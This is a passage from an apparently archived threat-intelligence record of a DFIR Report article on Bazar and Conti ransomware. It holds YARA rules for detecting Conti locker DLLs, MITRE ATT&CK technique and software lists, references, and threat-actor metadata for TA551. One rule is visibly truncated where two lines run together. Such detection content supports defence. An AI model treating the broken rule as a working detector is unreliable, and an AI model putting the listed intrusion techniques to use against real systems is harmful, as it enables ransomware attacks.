occured 1 times */\r\n $s9 = \"6#606B6\" fullword ascii /* Goodware String - occured 1 times */\r\n $s10 = \"\u003c!=X=u=\" fullword ascii /* Goodware String - occured 1 times */\r\n $s11 = \"expand 32-byte k\" fullword ascii /* Goodware String - occured 1 times */\r\n $s12 = \"6!7?7J7\" fullword ascii /* Goodware String - occured 2 times */\r\n $s13 = \"delete\" fullword ascii /* Goodware String - occured 2789 times */\r\n $s14 = \"4!4(4/464=4D4K4R4Z4b4j4v4\" fullword ascii /* Goodware String - occured 3 times */\r\n $s15 = \".CRT$XIAC\" fullword ascii /* Goodware String - occured 3 times */\r\n $s16 = \"0#0)01060\\\\0a0\" fullword ascii\r\n $s17 = \";\\\";/;=;K;V;l;\" fullword ascii\r\n $s18 = \"6,606P6X6\\\\6x6\" fullword ascii\r\n $s19 = \"6(6,6@6D6H6L6P6T6X6\\\\6`6d6p6t6x6|6\" fullword ascii\r\n $s20 = \"8 :M:}:\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 600KB and\r\n ( pe.imphash() == \"50472e0ba953856d228c7483b149ea72\" or all of them )\r\n}\r\nrule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86 {\r\n meta:\r\n description = \"conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-29\"\r\n hash1 = \"01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9\"\r\n strings:\r\n $s1 = \"conti_v3.dll\" fullword ascii\r\n $s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s3 = \"6 7/787E7[7\" fullword ascii /* hex encoded string 'gx~w' */\r\n $s4 = \"operator co_await\" fullword ascii\r\n $s5 = \"2%3.3f3~3\" fullword ascii /* hex encoded string '#?3' */\r\n $s6 = \"1\\\"1\u00261,:4:\u003c:D:L:T:\\\\:d:l:t:|:\" fullword ascii $s7 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide $s8 =\r\n $s17 = \"QQSVj8j@\" fullword ascii\r\n $s18 = \"5-5X5s5\" 
fullword ascii /* Goodware String - occured 1 times */\r\n $s19 = \"expand 32-byte k\" fullword ascii /* Goodware String - occured 1 times */\r\n $s20 = \"delete\" fullword ascii /* Goodware String - occured 2789 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 600KB and\r\n ( pe.imphash() == \"749dc5143e9fc01aa1d221fb9a48d5ea\" or all of them )\r\n}\r\nrule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64 {\r\n meta:\r\n description = \"conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-29\"\r\n hash1 = \"31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a\"\r\n strings:\r\n $s1 = \"conti_v3.dll\" fullword ascii\r\n $s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s3 = \"operator co_await\" fullword ascii\r\n $s4 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n $s5 = \"api-ms-win-core-file-l1-2-2\" fullword wide /* Goodware String - occured 1 times */\r\n $s6 = \"__swift_2\" fullword ascii\r\n $s7 = \"__swift_1\" fullword ascii\r\n $s8 = \"expand 32-byte k\" fullword ascii /* Goodware String - occured 1 times */\r\n $s9 = \"u3HcH\u003cH\" fullword ascii /* Goodware String - occured 2 times */\r\n $s10 = \"D$XD9x\" fullword ascii /* Goodware String - occured 2 times */\r\n $s11 = \"delete\" fullword ascii /* Goodware String - occured 2789 times */\r\n $s12 = \"ue!T$(H!T$ \" fullword ascii\r\n $s13 = \"L$\u00268\\\\$\u0026t,8Y\" fullword ascii\r\n $s14 = \"F 2-by\" fullword ascii\r\n $s15 = \"u\\\"8Z(t\" fullword ascii\r\n $s16 = \"L$ |+L;\" fullword ascii\r\n $s17 = \"vB8_(t\" fullword ascii\r\n $s18 = \"ext-ms-\" fullword wide\r\n $s19 = \"OOxq*H\" fullword ascii\r\n $s20 = \"H97u+A\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 600KB and\r\n ( pe.imphash() == \"137fa89046164fe07e0dd776ed7a0191\" or all of 
them )\r\n}\r\nMITRE\r\nT1218.010 - Signed Binary Proxy Execution: Regsvr32\r\nT1218.005 - Signed Binary Proxy Execution: Mshta\r\nT1218.011 - Signed Binary Proxy Execution: Rundll32\r\nT1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nT1105 - Ingress Tool Transfer\r\nT1059.005 - Command and Scripting Interpreter: Visual Basic\r\nT1059.007 - Command and Scripting Interpreter: JavaScript\r\nT1059.001 - Command and Scripting Interpreter: PowerShell\r\nT1055 - Process Injection\r\nT1486 - Data Encrypted for Impact\r\nT1482 - Domain Trust Discovery\r\nT1047 - Windows Management Instrumentation\r\nT1021.002 - Remote Services: SMB/Windows Admin Shares\r\nT1124 - System Time Discovery\r\nT1021.001 - Remote Services: Remote Desktop Protocol\r\nT1566.001 - Phishing: Spearphishing Attachment\r\nT1087.002 - Account Discovery: Domain Account\r\nT1087.001 - Account Discovery: Local Account\r\nT1057 - Process Discovery\r\nT1083 - File and Directory Discovery\r\nT1590.005 - Gather Victim Network Information: IP Addresses\r\nMITRE Software\r\nNet – S0039\r\nNltest – S0359\r\nCmd – S0106\r\nTasklist – S0057\r\nCobalt Strike – S0154\r\nAdFind – S0552\r\nReference\r\nDetecting Rclone – An Effective Tool for Exfiltration, NCC Group –\r\nhttps://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\r\nRundll32, Red Canary – https://redcanary.com/threat-detection-report/techniques/rundll32/\r\nTA551 (Shathak) continues pushing BazarLoader, infections lead to Cobalt Strike, SANS ISC –\r\nhttps://isc.sans.edu/forums/diary/TA551+Shathak+continues+pushing+BazarLoader+infections+lead+to+Cobalt+Strike/277\r\nInvoke-ShareFinder, GitHub [Veil PowerView] – https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1\r\ntaskmgr.exe slashing numbers, Hexacorn – 
https://www.hexacorn.com/blog/2018/07/22/taskmgr-exe-slashing-numbers/\r\nInternal case #5794\r\nSource: https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/"
	],
	"report_names": [
		"continuing-the-bazar-ransomware-story"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434019,
	"ts_updated_at": 1775792243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/64e1e4cdab99fefe919b03ea76f82364cd9d41b1.pdf",
		"text": "https://archive.orkl.eu/64e1e4cdab99fefe919b03ea76f82364cd9d41b1.txt",
		"img": "https://archive.orkl.eu/64e1e4cdab99fefe919b03ea76f82364cd9d41b1.jpg"
	}
}